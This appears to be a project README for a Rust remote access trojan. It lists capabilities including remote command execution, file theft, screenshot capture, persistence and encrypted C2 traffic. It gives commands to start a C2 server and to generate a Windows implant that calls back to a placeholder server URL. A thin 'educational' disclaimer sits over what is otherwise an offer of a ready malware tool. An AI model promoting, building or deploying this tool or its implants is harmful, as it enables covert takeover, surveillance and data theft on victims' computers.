A simple remote access trojan (RAT) written in Rust.
This project is strictly for educational/research purposes, any malicious activities that involve use of this repository is not the responsibility of the owner. ⚡ Ignore at your own risk! ⚡
- HTTP-based C2 communication
- Cross-platform (Windows/Linux)
- Command execution
- File upload/download
- Screenshot capture
- Persistence mechanisms
- Encrypted communications (AES-256-GCM)
- Web UI dashboard
- Troll commands (rickroll, speak, popup, wallpaper, mouse_chaos)
cargo build --release# Start the C2 server
remy server -p 8080
# Build a client payload
remy generate --os windows --c2 http://your-server:8080remy/
├── src/
│ ├── main.rs
│ ├── server/ # C2 server
│ ├── client/ # Implant/payload
│ ├── crypto/ # Encryption
│ └── commands/ # Available commands
└── Cargo.toml
This project is licensed under the MIT License. See LICENSE for more information.
